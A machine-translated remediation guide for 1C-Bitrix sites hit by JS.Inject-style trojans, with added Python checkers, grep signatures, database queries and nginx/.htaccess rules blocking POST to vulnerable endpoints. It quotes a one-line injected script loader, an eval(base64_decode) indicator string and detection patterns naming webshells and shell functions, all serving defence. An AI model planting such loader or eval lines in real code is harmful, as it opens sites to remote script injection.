Fighting Trojans like JS.Inject
All English-language materials have been translated fully automatically using the Google service
The code and the description of how to deal with trojans are provided as is; you use them at your own risk.
Before scanning for viruses, you need to:
1. Change the passwords for the admin panel, FTP/SSH and the hosting control panel
2. Make sure that the computer from which the cleanup is performed is not itself infected: scan it with an antivirus first
3. Make a full backup of the site, both through the admin panel and through the hosting control panel
4. Use the solution from 1C-Bitrix to search for trojans
5. Contact your hosting provider's technical support and ask them to check the site with an antivirus. Sometimes this service is free, sometimes it costs a symbolic amount. Don't miss this opportunity
If you decide to look for the virus yourself, in most cases you need to:
Scroll the file bitrix\js\main\core\core.js to the very bottom and make sure that there is no strange or obfuscated code before or after the line //# sourceMappingURL=core.js.map (around line 18459). You may see something like:
s=document.createElement(`script`);s.src=atob(`ENCODED_STRING`);document.head.appendChild(s);
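As an added example (not code from the article), the following Python check automates the core.js inspection just described: it finds the sourceMappingURL line, flags loader fragments around it, and decodes any atob() argument so that the URL the injected loader would fetch is visible for log searches and blocking. The samples at the bottom are constructed; the URL inside them is a placeholder, not a real indicator.

```python
import base64
import re

# Added example, not from the article: automate the manual check of the tail of
# bitrix/js/main/core/core.js. The marker line is legitimate; code placed right
# before it or anywhere after it is what the article tells you to look for.
MARKER = "//# sourceMappingURL=core.js.map"

# Fragments of the loader shape shown in the article
# (s=document.createElement(`script`);s.src=atob(`...`);document.head.appendChild(s);)
LOADER_PATTERNS = [
    re.compile(r"document\.createElement\(\s*[`'\"]script[`'\"]\s*\)"),
    re.compile(r"atob\(\s*[`'\"][A-Za-z0-9+/=]+[`'\"]\s*\)"),
    re.compile(r"document\.head\.appendChild\("),
]
ATOB_ARG = re.compile(r"atob\(\s*[`'\"]([A-Za-z0-9+/=]+)[`'\"]\s*\)")


def inspect_core_js(text: str, context_lines: int = 5) -> dict:
    """Report loader fragments near or after the source map comment.

    Returns whether the marker was found, the number of lines after it (should
    be 0), the matched fragments, and the decoded atob() arguments (the script
    URL the loader would fetch).
    """
    lines = text.splitlines()
    idx = next((i for i, line in enumerate(lines) if line.strip() == MARKER), len(lines))
    # Region to inspect: a few lines before the marker, plus everything after it.
    region = lines[max(0, idx - context_lines):idx] + lines[idx + 1:]
    hits = [m.group(0) for line in region for pat in LOADER_PATTERNS for m in pat.finditer(line)]
    decoded = []
    for line in region:
        for m in ATOB_ARG.finditer(line):
            try:
                decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
            except ValueError:
                decoded.append("<undecodable:%s>" % m.group(1)[:16])
    return {
        "marker_found": idx < len(lines),
        "trailing_lines": max(0, len(lines) - idx - 1),
        "hits": hits,
        "decoded_src": decoded,
    }


# Constructed samples (the URL is a placeholder, not a real indicator).
SAMPLE_B64 = base64.b64encode(b"https://example.invalid/loader.js").decode()
CLEAN_SAMPLE = "BX.ready(function(){});\n" + MARKER + "\n"
INFECTED_SAMPLE = (
    CLEAN_SAMPLE
    + "s=document.createElement(`script`);s.src=atob(`" + SAMPLE_B64
    + "`);document.head.appendChild(s);\n"
)

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN_SAMPLE), ("infected", INFECTED_SAMPLE)):
        print(name, inspect_core_js(sample))
```

Run it against the real file with `inspect_core_js(open("bitrix/js/main/core/core.js").read())`; a non-zero `trailing_lines` or any entry in `hits` means the file needs a manual look, and `decoded_src` gives the loader URL to search for in the web server logs and the database.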
Check the file bitrix\modules\main\include\prolog.php for unwanted code inserts, or simply replace it with a fresh copy. At the time of publication the file looked like this:
<?
require_once(dirname(__FILE__)."/../bx_root.php");
if (file_exists($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/html_pages/.enabled"))
{
    require_once(dirname(__FILE__)."/../lib/composite/responder.php");
    Bitrix\Main\Composite\Responder::respond();
}
require_once(dirname(__FILE__)."/prolog_before.php");
require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_after.php");
Scan folders and files by last modified date
This is the most effective method if you know the file structure and the date of infection well. Run the command over SSH or in the hosting console (if it provides one). In this form the command lists all files with a .ph* extension that were changed in the last 3 days:
find . -name '*.ph*' -mtime -3
Content search for malicious code
find ./ -type f -name "*.php" -exec grep -i -H "wso shell\|Backdoor\|Shell\|base64_decode\|str_rot13\|gzuncompress\|gzinflate\|strrev\|killall\|navigator.userAgent.match\|mysql_safe\|UdpFlood\|40,101,115,110,98,114,105,110\|msg=@gzinflate\|sql2_safe\|NlOThmMjgyODM0NjkyODdiYT\|6POkiojiO7iY3ns1rn8\|var vst = String.fromCharCode\|c999sh\|request12.php\|auth_pass\|shell_exec\|FilesMan\|passthru\|system\|passwd\|mkdir\|chmod\|mkdir\|md5=\|e2aa4e\|file_get_contents\|eval\|stripslashes\|fsockopen\|pfsockopen\|base64_files" {} \;
or without find:
grep -R -i -H -E "wso shell|Backdoor|Shell|base64_decode|str_rot13|gzuncompress|gzinflate|strrev|killall|navigator.userAgent.match|mysql_safe|UdpFlood|40,101,115,110,98,114,105,110|msg=@gzinflate|sql2_safe|NlOThmMjgyODM0NjkyODdiYT|6POkiojiO7iY3ns1rn8|var vst = String.fromCharCode|c999sh|request12.php|auth_pass|shell_exec|FilesMan|passthru|system|passwd|mkdir|chmod|md5=|e2aa4e|file_get_contents|eval|stripslashes|fsockopen|pfsockopen|base64_files" ./
Keep in mind that generic words in this list (system, passwd, mkdir, eval, file_get_contents and the like) also occur in legitimate Bitrix code, so the output is a list of files to review by hand, not a verdict. Combining it with the modification date from the previous step narrows the list considerably.
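As an added example (not code from the article), here is a Python scanner that combines the two checks above: the modification time window of `find -mtime` and the content signatures of the grep command. The signatures are split into a high-confidence group (webshell names and the `eval(base64_decode(` pattern) and a low-confidence group (generic PHP functions), so that the noisy matches can be reviewed last. The sample site it builds is constructed; the "webshell" in it is only an indicator string for the scanner, not working code.

```python
import os
import re
import tempfile
import time
from dataclasses import dataclass
from pathlib import Path

# Added example, not from the article: a scanner that combines the two checks
# above (modification time window and content signatures). Signatures are split
# by confidence because generic words such as system, eval or file_get_contents
# also occur in legitimate Bitrix code and produce noise in the grep output.
HIGH_CONFIDENCE = [re.compile(p, re.IGNORECASE) for p in (
    r"wso shell", r"FilesMan", r"c999sh", r"UdpFlood", r"auth_pass", r"msg=@gzinflate",
    r"eval\s*\(\s*@?\s*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(",
)]
LOW_CONFIDENCE = [re.compile(p, re.IGNORECASE) for p in (
    r"base64_decode", r"\beval\s*\(", r"shell_exec", r"passthru", r"\bsystem\s*\(",
    r"p?fsockopen", r"file_get_contents", r"stripslashes", r"str_rot13", r"gzinflate",
)]


@dataclass
class Finding:
    path: str
    line: int
    level: str
    pattern: str


def scan_tree(root, days=None, exts=(".php", ".phtml", ".php5", ".phar")):
    """Walk root and return findings for PHP-like files, optionally only those
    modified within the last `days` days (the article's find -mtime -3)."""
    now = time.time()
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in exts:
            continue
        if days is not None and now - path.stat().st_mtime > days * 86400:
            continue
        text = path.read_text(errors="replace")
        rel = path.relative_to(root).as_posix()
        for lineno, line in enumerate(text.splitlines(), 1):
            for level, patterns in (("high", HIGH_CONFIDENCE), ("low", LOW_CONFIDENCE)):
                for pat in patterns:
                    if pat.search(line):
                        findings.append(Finding(rel, lineno, level, pat.pattern))
    return findings


def build_sample_site():
    """Constructed sample tree: a clean include, a freshly dropped file with a
    webshell-style indicator, and an old file that only trips a generic word."""
    root = tempfile.mkdtemp(prefix="bx_scan_")
    files = {
        "bitrix/modules/main/include/prolog.php":
            '<?php\nrequire_once(dirname(__FILE__)."/../bx_root.php");\n',
        # indicator string only, constructed for the scanner; it is not a working shell
        "upload/iblock/cache_x.php": '<?php\n@eval(base64_decode($payload));\n',
        "local/php_interface/init.php":
            '<?php\n$cfg = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/cfg.json");\n',
    }
    for rel, body in files.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    old = time.time() - 10 * 86400  # make init.php look 10 days old
    os.utime(Path(root, "local/php_interface/init.php"), (old, old))
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for f in scan_tree(site, days=3):
        print(f"{f.level:4} {f.path}:{f.line} {f.pattern}")
```

On a real site call `scan_tree("/path/to/docroot", days=3)` right after the backup; review the `high` findings first, then the `low` ones in files whose modification date you cannot explain.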
Checking the database for inserts
In phpMyAdmin, search the database for the following strings one by one:
<script , <? , <?php , <iframe
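As an added example (not from the article), the following Python helper replaces the table-by-table search in phpMyAdmin: the `COLUMNS_QUERY` lists every text column of the current schema via information_schema, and `build_marker_query` turns that list into one MySQL statement that counts rows containing each of the four strings above, reporting only columns with hits. The column list at the bottom is a constructed sample of what information_schema returns.

```python
# Added example, not from the article: instead of searching table by table in
# phpMyAdmin, list the text columns of the schema with COLUMNS_QUERY and build
# one statement that counts rows containing each marker per column.
COLUMNS_QUERY = (
    "SELECT TABLE_NAME, COLUMN_NAME FROM information_schema.COLUMNS "
    "WHERE TABLE_SCHEMA = DATABASE() "
    "AND DATA_TYPE IN ('varchar', 'text', 'tinytext', 'mediumtext', 'longtext')"
)
# The four strings the article tells you to search for. Note that "<?" also
# matches legitimate "<?xml ..." prologs stored in the database, so its hits
# need a manual look.
MARKERS = ("<script", "<?", "<?php", "<iframe")


def escape_like(value: str) -> str:
    """Escape LIKE metacharacters; '!' is declared as the escape character."""
    return value.replace("!", "!!").replace("%", "!%").replace("_", "!_")


def build_marker_query(columns, markers=MARKERS) -> str:
    """columns: iterable of (table, column) pairs, e.g. the rows of COLUMNS_QUERY.
    Returns MySQL that reports only the columns with at least one hit."""
    selects = []
    for table, column in columns:
        for marker in markers:
            lit = marker.replace("'", "''")  # literal goes into a quoted SQL string
            selects.append(
                f"SELECT '{table}' AS tbl, '{column}' AS col, '{lit}' AS marker, COUNT(*) AS hits "
                f"FROM `{table}` WHERE `{column}` LIKE '%{escape_like(lit)}%' ESCAPE '!'"
            )
    union = "\n  UNION ALL\n  ".join(selects)
    return f"SELECT * FROM (\n  {union}\n) AS t WHERE hits > 0 ORDER BY hits DESC"


# Constructed sample column list (the shape information_schema returns).
SAMPLE_COLUMNS = [
    ("b_iblock_element", "PREVIEW_TEXT"),
    ("b_iblock_element", "DETAIL_TEXT"),
    ("b_option", "VALUE"),
]

if __name__ == "__main__":
    print(build_marker_query(SAMPLE_COLUMNS))
```

Run `COLUMNS_QUERY` first (in phpMyAdmin or the mysql client), feed its rows to `build_marker_query`, and run the generated statement; on a large database split the column list into batches so a single UNION does not run for too long.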
In case of infection through the Bitrix vote module
POST requests to the following Bitrix system files must be prohibited:
/bitrix/tools/upload.php
/bitrix/tools/mail_entry.php
/bitrix/modules/main/include/virtual_file_system.php
/bitrix/components/bitrix/sender.mail.editor/ajax.php
/bitrix/tools/vote/uf.php
/bitrix/tools/html_editor_action.php
/bitrix/admin/site_checker.php
1. Manual editing of the files. Add the following at the very top of each of the files listed above, before its first require:
// Reject POST requests to this file: answer 404 and stop before any Bitrix code runs.
// http_response_code() sets the status under every SAPI; a raw "Status:" header is only honoured by some of them.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    http_response_code(404);
    die();
}
2. Blocking via nginx
# note: this breaks file uploads to information blocks (iblocks)
# "deny all" is not permitted inside an "if" block (nginx refuses to load such a config),
# so the POST branch answers with "return 403" instead. After editing, run "nginx -t" and
# send a test GET and POST to each path: a later regex location such as "location ~ \.php$"
# takes precedence over these prefix locations, and GET requests must still be handed to
# PHP (fastcgi_pass/proxy_pass), otherwise the .php file is served as a static file.
location /bitrix/tools/upload.php {
    if ($request_method = POST) {
        return 403;
    }
}
location /bitrix/tools/mail_entry.php {
    if ($request_method = POST) {
        return 403;
    }
}
location /bitrix/tools/vote/uf.php {
    if ($request_method = POST) {
        return 403;
    }
}
location /bitrix/tools/html_editor_action.php {
    if ($request_method = POST) {
        return 403;
    }
}
location /bitrix/admin/site_checker.php {
    if ($request_method = POST) {
        return 403;
    }
}
3. Via .htaccess. Place a .htaccess file in each of the directories below with a construction of the form (Apache 2.2 syntax; on Apache 2.4 use "Require all denied" instead of "deny from all"):
<Files ~ "^(file_names)\.php$">
deny from all
</Files>
Note that this denies every request method to the file, not only POST, which is why part of the admin panel functionality stops working while the rule is in place.
For /bitrix/tools/:
<Files ~ "^(html_editor_action|mail_entry|upload)\.php$">
deny from all
</Files>
For /bitrix/tools/vote/:
<Files ~ "^(uf)\.php$">
deny from all
</Files>
For /bitrix/modules/main/include/:
<Files ~ "^(virtual_file_system)\.php$">
deny from all
</Files>
For /bitrix/components/bitrix/sender.mail.editor/:
<Files ~ "^(ajax)\.php$">
deny from all
</Files>
For /bitrix/admin/:
<Files ~ "^(site_checker)\.php$">
deny from all
</Files>
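Whichever of the three variants is applied, it is worth confirming from outside that it actually works. The following Python script is an added example (not from the article): it sends a POST and a GET to each of the seven protected paths and reports whether the POST was rejected and whether the GET body looks like PHP source (which is what a misplaced web server rule produces when it serves the .php file statically instead of passing it to PHP). The built-in mock site is a constructed stand-in so the script runs offline; in practice point `check_post_blocked` at the real site URL.

```python
import http.server
import threading
import urllib.error
import urllib.request

# Added example, not from the article: verify that POST to each protected path is
# rejected while GET does not leak PHP source. The mock site below is constructed.
PROTECTED_PATHS = [
    "/bitrix/tools/upload.php",
    "/bitrix/tools/mail_entry.php",
    "/bitrix/modules/main/include/virtual_file_system.php",
    "/bitrix/components/bitrix/sender.mail.editor/ajax.php",
    "/bitrix/tools/vote/uf.php",
    "/bitrix/tools/html_editor_action.php",
    "/bitrix/admin/site_checker.php",
]
# Direct connection, ignoring proxy environment variables.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def request_status(url: str, method: str, timeout: float = 10.0):
    """Return (status code, first 512 bytes of the body) without raising on 4xx/5xx."""
    req = urllib.request.Request(url, data=b"" if method == "POST" else None, method=method)
    try:
        with OPENER.open(req, timeout=timeout) as resp:
            return resp.status, resp.read(512)
    except urllib.error.HTTPError as err:
        return err.code, err.read(512)


def check_post_blocked(base_url: str, paths=PROTECTED_PATHS, blocked=(403, 404, 405)):
    """For every path report the POST and GET status and whether the block looks right:
    POST must get one of `blocked`, and the GET body must not start with a PHP open tag."""
    base = base_url.rstrip("/")
    report = {}
    for path in paths:
        post_code, _ = request_status(base + path, "POST")
        get_code, body = request_status(base + path, "GET")
        source_leak = body.lstrip().startswith(b"<?")
        report[path] = {"post": post_code, "get": get_code,
                        "ok": post_code in blocked and not source_leak}
    return report


def start_mock_site():
    """Constructed stand-in for a hardened site (not Bitrix): GET -> 200 HTML, POST -> 403."""
    class Handler(http.server.BaseHTTPRequestHandler):
        def _reply(self, code, body):
            self.send_response(code)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def do_GET(self):
            self._reply(200, b"<html><body>ok</body></html>")

        def do_POST(self):
            self._reply(403, b"forbidden")

        def log_message(self, *args):  # keep the example quiet
            pass

    server = http.server.HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_port}"


if __name__ == "__main__":
    srv, url = start_mock_site()
    for path, r in check_post_blocked(url).items():
        print("OK  " if r["ok"] else "FAIL", path, r)
    srv.shutdown()
```

A `FAIL` with a 200 on POST means the rule is not being applied to that path (for nginx, typically because another location wins); a `FAIL` with a GET body starting with `<?` means the file is being served statically and the rule must be moved into the location that passes requests to PHP.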
It is recommended to apply this solution only for the duration of the attacks, because part of the admin panel functionality will be unavailable. The preferable solution is to update Bitrix to the current version or to get rid of the vote module.
This solution is described here: Mass hacking of sites on 1C-Bitrix. How to protect yourself?
If viruses are found, I strongly recommend contacting cybersecurity specialists (not me).